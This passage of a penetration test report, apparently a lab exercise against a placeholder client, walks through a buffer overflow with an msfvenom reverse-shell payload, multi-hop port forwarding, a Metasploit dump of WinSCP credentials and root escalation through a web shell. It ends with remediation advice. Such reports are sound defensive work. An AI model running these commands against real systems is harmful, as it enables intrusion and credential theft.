NOMBRECLIENTE - CONFIDENTIAL Page 66

 CYBERLAND SEC

And we get the badchars, \x00 and the \x0a

Figure 4.1.14: Badchars

We repeat the process until we find all the badchars it has and we find the following badchars:
\x00\x0a\x0d

Now we paste all the badchars into the exploit.py (removing \x00\x0a\x0d) and run the
exploit.py again

NOMBRECLIENTE - CONFIDENTIAL Page 67

 CYBERLAND SEC

Figure 4.1.15: Setting Badchars on the Payload

We run exploit.py again and no more badchars appear.

NOMBRECLIENTE - CONFIDENTIAL Page 68

 CYBERLAND SEC

Figure 4.1.16: No more badchars

Now we have to find the JMP pointer with the following mona command: !mona jmp -r esp -cpb
¨\x00\x0a\x0d¨

Figure 4.1.17: Finding the pointer

NOMBRECLIENTE - CONFIDENTIAL Page 69

 CYBERLAND SEC

Having the pointer (080416bf) we have to place it upside down = ¨\xBF\x16\x04\x08¨

We also have to generate the payload with msfvenom to gain access through a reverse shell
with the following command: msfvenom -p windows/shell_reverse_tcp LHOST=10.185.10.27
LPORT=8887 -b "\x00\x0a\x0d" -f python

Now we just need to edit the CustomerManagerClient.py file and add all the data and run it with
proxychains and Python2: proxychains python2 CustomerManagerClient.py

Figure 4.1.18: CustomerManagerClient.py file

NOMBRECLIENTE - CONFIDENTIAL Page 70

 CYBERLAND SEC

Once executed, it will send the reverse shell to machine 10.185.10.27 through port 8887, which
will forward it to machine 10.90.60.80 through port 7776, which in turn will redirect it to our
machine through port 8181.

Figure 4.1.19: Host 10.185.10.27 listening at 8887 and send to 10.90.60.80

Figure 4.1.20: Host 10.90.60.80 listening at 7776 and send to 172.16.40.5

NOMBRECLIENTE - CONFIDENTIAL Page 71

 CYBERLAND SEC

Figure 4.1.21: Conection to 10.185.10.55 Host

Remediation Plan

• Use modern languages: Prefer languages with automatic memory management, like
Python or Java.

• Safe Libraries: Use functions with built-in bounds checking, such as strncpy instead of
strcpy.

• Code Reviews: Regularly review code and use static analysis tools.

NOMBRECLIENTE - CONFIDENTIAL Page 72

 CYBERLAND SEC

References

• https://www.synopsys.com/blogs/software-security/detect-prevent-and-mitigate-buffer-
overflow-attacks.html

4.2 – WinSCP Credentials in Memory

HIGH

Exploitation Likelihood Possible

Business Impact Major

Remediation Difficulty Easy

Type Information Disclosure

Description
The Metasploit module Windows Gather Credentials WinSCP is used to dump credentials from
the WinSCP application on a compromised Windows system. This module exploits the fact that
WinSCP can store user credentials, such as usernames and passwords, in its configuration files
and memory. By accessing these stored credentials, an attacker can gain unauthorized access
to various systems and services.

Analysis

Enumerating the directories and files of machine 10.185.10.55 we find that it possibly has
WinSCP installed, and we verify that there is a module in metasploit to be able to obtain
credentials used in WinSCP that are saved in memory.

NOMBRECLIENTE - CONFIDENTIAL Page 73

 CYBERLAND SEC

Figure 4.2.1: WinSCP Installer

We will need to obtain a meterpreter session from host 10.185.10.55, since we have not been
pivoting with metasploit, we will now do it to gain access and be able to exploit the vulnerability.

We exploited the aforementioned PHP_CGI vulnerability on host 10.90.60.80 to obtain a

meterpreter session.

We add the network segment 10.185.10.0/24 with the metasploit autoroute module in the
meterpreter session where we have the connection with the host 10.90.60.80

NOMBRECLIENTE - CONFIDENTIAL Page 74

 CYBERLAND SEC

Figure 4.2.2: Adding network segment 10.185.10.0/24

With msfvenom we create a payload that when executed connects to machine 10.185.10.27, it
will be listening on port 6565 and on machine 10.185.10.27 using the command: netsh interface
portproxy add v4tov4 listenaddress=10.185.10.27 listenport=6565 connectaddress =172.16.40.5
connectport=6565 we will forward the traffic to our attacking machine through the same port
6565

NOMBRECLIENTE - CONFIDENTIAL Page 75

 CYBERLAND SEC

Figure 4.2.3: Creating payload and share to 10.90.60.80 host

Figure 4.2.4: Getting the payload on the 10.185.10.55 host

Now we listen using metasploit.

NOMBRECLIENTE - CONFIDENTIAL Page 76

 CYBERLAND SEC

Figure 4.2.5: Listening with metasploit

All that remains is to execute the payload on host 10.185.10.55 and we will receive a
meterpreter session.

NOMBRECLIENTE - CONFIDENTIAL Page 77

 CYBERLAND SEC

Figure 4.2.6: Receiving the meterpreter session

Now we can use the metasploit module to dump the saved WinSCP credentials.

Figure 4.2.7: Extracting WinSCP credentials

NOMBRECLIENTE - CONFIDENTIAL Page 78

 CYBERLAND SEC

As we can see, we have found a new host 10.185.11.127 and its credentials to enter via SSH.

Figure 4.2.8: Windows Ping Sweep on 10.185.11.0/24 subnet

Remediation Plan

• Use a master password on WinSCP

• Upgrade WinSCP to the latest stable version

• Separate the credentials from the script/code into a configuration file. While the
script/code without explicit credentials can be safely stored into a revision system and be
otherwise accessible, the configuration file should be protected as much as possible.
Particularly its file permissions should be restricted only to administrators (for writing)
and user under which the script/code runs (for reading). The configuration file can also
be encrypted, for example with built-in NTFS filesystem-level encryption.

References

• https://winscp.net/eng/docs/guide_protecting_credentials_for_automation

NOMBRECLIENTE - CONFIDENTIAL Page 79

 CYBERLAND SEC

5 – 10.185.11.127

10.185.11.127
Linux

# Port Protocol / Service

22 SSH

Figure 5a: NMAP - Proxychains

NOMBRECLIENTE - CONFIDENTIAL Page 80

 CYBERLAND SEC

5.1 – Privilege Escalation

CRITICAL

Exploitation Likelihood Possible

Business Impact Major

Remediation Difficulty Moderate

Type Security Misconfiguration

Description
Privilege escalation is a type of security vulnerability where an attacker gains elevated access to
resources that are normally protected from an application or user. This can occur in two forms:
1. Vertical Privilege Escalation: The attacker gains higher-level access than intended,
such as gaining administrative privileges.
2. Horizontal Privilege Escalation: The attacker accesses resources or functions
intended for other users with similar access levels.
Exploiting privilege escalation vulnerabilities can lead to unauthorized access to sensitive data,
the ability to alter system configurations, or even full control over the affected system. This
makes it crucial for systems to enforce strict access controls and regularly update and patch
software to prevent such exploits.

Analysis
Previously on host 10.185.10.55 we found the access credentials via SSH to machine
10.185.11.127

NOMBRECLIENTE - CONFIDENTIAL Page 81

 CYBERLAND SEC

Figure 5.1.1: Connection to 10.185.11.127 Host - SSH

Once we are inside, listing directories and files we find a file called z-cmd.php.

NOMBRECLIENTE - CONFIDENTIAL Page 82

 CYBERLAND SEC

Figure 5.1.2: Connection to 10.185.11.127 Host – SSH

This code is a web shell that allows for the execution of arbitrary system commands passed via
the POST parameter z. Since this file is owned by the root user and has read and write
permissions for the root user (-rw-r--r--), but read permissions for others, you can leverage it to
escalate privileges if it is accessible via a web server.

To escalate privileges, we can run a command that gives us administrator access. For example,
we can add the user Jimmy or a new one to the sudoers file.

NOMBRECLIENTE - CONFIDENTIAL Page 83

 CYBERLAND SEC

Figure 5.1.3: Execution of the Curl command

Remediation Plan

• Use Web Application Firewalls: Deploy a WAF to detect and block malicious requests
that attempt to exploit vulnerabilities in web applications.

• Remove Unnecessary Files: Regularly clean up your web server directories and remove
files that are not needed, especially those left by developers or during testing phases.

• Ensure sensitive files, especially those that can execute commands, are not accessible
to unauthorized users. Set appropriate file permissions and ownership.

References

• https://www.paloaltonetworks.com/cyberpedia/what-is-a-web-application-firewall

NOMBRECLIENTE - CONFIDENTIAL Page 84

 CYBERLAND SEC

REMEDIATION PLAN
1 – 10.90.60.80 (NOMBRECLIENTE Web Server)

1.1 – SQL Injection

• Mitigating SQL injection primarily involves input validation. Input validation ensures that
the type, length, and format of user input are acceptable, allowing only valid data to be
processed. This prevents malicious commands from being executed. Key practices
include using regular expressions as whitelists for structured data and ensuring fixed set
values (e.g., from drop-down lists) match one of the offered options exactly.

1.2 – PHP Common Gateway Interface (CGI) – CVE-2012-1823

• Upgrade to PHP version 5.3.12, PHP version 5.4.2, or a later release. Alternatively, you
can use this 'mod_rewrite' rule as a temporary solution:

RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]

RewriteRule ^(.*) $1?

1.3 – Cross Site Scripting (XSS)

• Escaping: This involves processing user input to ensure it is safe before rendering it. By
escaping key characters like < and >, you prevent them from being interpreted
maliciously.

• Validating Input: This ensures only correct data is rendered by the application,
preventing malicious input. Whitelisting known good characters is more effective than
blacklisting bad characters for preventing XSS.

• Sanitizing: This method cleans user input to remove potentially harmful markup,
especially useful for sites that allow HTML. It should be used alongside escaping and
validating input for robust protection.

1.4 – Unrestricted File Upload

• Content-Type Header Validation: Ensure the "Content-Type" header in the request
indicates a valid file type. However, this can be bypassed by altering the header using a
web proxy.

• Whitelisting File Extensions: Use a whitelist to validate file extensions, ensuring to

review the list for potentially malicious extensions. Also, watch for bypass techniques like
double extensions.

NOMBRECLIENTE - CONFIDENTIAL Page 85

 CYBERLAND SEC

• File Type Detector: Employ functions or APIs to check file types by examining the file's
initial characters or headers. Be cautious as attackers can insert malicious code within
valid headers or file metadata, and obfuscate or encode it to bypass detection. Ensure
the application handles compressed files securely to prevent crafting of malicious code.

1.5 – Privilege Escalation

• A low-privileged user should never be allowed to execute commands as a root user or
alter files that belong to root or are located in the root directory under any circumstances.

1.6 – Information Disclosure

• If storing credentials in configuration files is unavoidable, ensure the files are encrypted
using strong encryption standards like AES-256. Ensure only authorized processes or
users can decrypt and access these files.

• Use secrets management solutions like HashiCorp Vault, AWS Secrets Manager, or
Azure Key Vault to securely store and manage access to sensitive information.
• Replace MD5 with more secure algorithms like bcrypt, Argon2, or SHA-256. These
algorithms provide better security through stronger encryption and built-in mechanisms
to mitigate brute force attacks.

2 – 10.185.10.34

2.1 –Eternal Blue / PSEXEC - CVE-2017-0144 (MS17-010)

• To prevent them from entering through the psexec module (abusing the MS-17-010
vulnerability) is to apply the Windows 7 security patch

• If it’s possible, upgrade to the next version of Windows (Preferably Windows 10)

2.2 – Dumped Credentials – Mimikatz

● Regularly apply patches and updates

● Disable NTLM Authentication: Use secure protocols like Kerberos

3 – 10.185.10.27

3.1 – Eternal Blue – CVE-2017-0144 (MS17-010)

• To prevent them from entering through the psexec module (abusing the MS-17-010
vulnerability) is to apply the Windows 7 security patch.

NOMBRECLIENTE - CONFIDENTIAL Page 86

 CYBERLAND SEC

• If it’s possible, upgrade to the next version of Windows (Preferably Windows 10).

3.2 – Dumped Credentials – Mimikatz

● Regularly apply patches and updates

● Disable NTLM Authentication: Use secure protocols like Kerberos

3.3 – Information Disclosure

● Delete the file

● To mitigate this risk, it is essential to implement proper data handling practices, enforce
strict access controls, securely configure systems, and regularly audit for potential leaks.

4 – 10.185.10.55

4.1 – Buffer Over Flow (BOF)

• Use modern languages: Prefer languages with automatic memory management, like
Python or Java.

• Safe Libraries: Use functions with built-in bounds checking, such as strncpy instead of
strcpy.

• Code Reviews: Regularly review code and use static analysis tools.

4.2 – WinSCP Credentials in Memory

• Use a master password on WinSCP

• Upgrade WinSCP to the latest stable version

• Separate the credentials from the script/code into a configuration file. While the
script/code without explicit credentials can be safely stored into a revision system and be
otherwise accessible, the configuration file should be protected as much as possible.
Particularly its file permissions should be restricted only to administrators (for writing)
and user under which the script/code runs (for reading). The configuration file can also
be encrypted, for example with built-in NTFS filesystem-level encryption.

NOMBRECLIENTE - CONFIDENTIAL Page 87

 CYBERLAND SEC

5 – 10.185.11.127

5.1 – Privilege Escalation

• Use Web Application Firewalls: Deploy a WAF to detect and block malicious requests
that attempt to exploit vulnerabilities in web applications.

• Remove Unnecessary Files: Regularly clean up your web server directories and remove
files that are not needed, especially those left by developers or during testing phases.

• Ensure sensitive files, especially those that can execute commands, are not accessible
to unauthorized users. Set appropriate file permissions and ownership.

EXPLOITED HOSTS AND VULNERABILITIES

HOST (IP) OPEN SERVICES ACCESS VULNERABILITIES EXPLOTED
PORTS OBTAINED

10.90.60.80 80 / 5923 HTTP YES SQL Injection / PHP_CGI / XSS /

Unrestricted File Upload / Privilege
Escalation / Information Disclosure

10.185.10.34 135 / 139 / Msrpc / Netbios- YES Eternal Blue CVE-2017-0144 (MS17-
445 ssn / SMB 010) / Dumped Credentials - Mimikatz

10.185.10.27 135 / 139 Msrpc / Netbios- YES Eternal Blue – CVE-2017-0144

445 ssn / SMB (MS17-010) / Dumped Credentials –
Mimikatz / Information Disclosure

10.185.10.55 42424 Customer YES Buffer Over Flow (BOF) / WinSCP

Manager Portal Credentials in Memory

10.185.11.127 22 SSH YES Privilege Escalation

NOMBRECLIENTE - CONFIDENTIAL Page 88

 CYBERLAND SEC

APPENDIX A – TOOLS USED

TOOL DESCRIPTION

BurpSuite Community Edition Used for testing of web applications.

Chisel Used for creating secure tunnels to bypass firewalls.

Gobuster Used for brute-force scanning of URLs, directories, and files.

Metasploit Used for exploitation of vulnerable services and vulnerability scanning.

Mimikatz Used for extracting passwords and other credential information.

Nikto Used for scanning web servers for vulnerabilities.

Nmap Used for scanning ports on hosts.

Smbclient Used for accessing shared folders on SMB/CIFS networks.

Socat Used for data transfer between two places, acting as a relay.

Sqlmap Used for detecting and exploiting SQL injection flaws.

Table A.1: Tools used during assessment

NOMBRECLIENTE - CONFIDENTIAL Page 89

 CYBERLAND SEC

APPENDIX B - ENGAGEMENT INFORMATION

Client Information

Client NOMBRECLIENTE

Primary Contact Adams Brown,

CEO

Approvers The following people are authorized to change the scope of

engagement and modify the terms of the engagement
● Adams Brown
● David Parker

Version Information

Version Date Description

1.0 03/06/2024 Initial report to client

Contact Information

Name CYBERLAND SEC

Address 1001 Roland Street, Gotham, NY 11201

Phone 555-185-1782

Email [email protected]

NOMBRECLIENTE - CONFIDENTIAL Page 90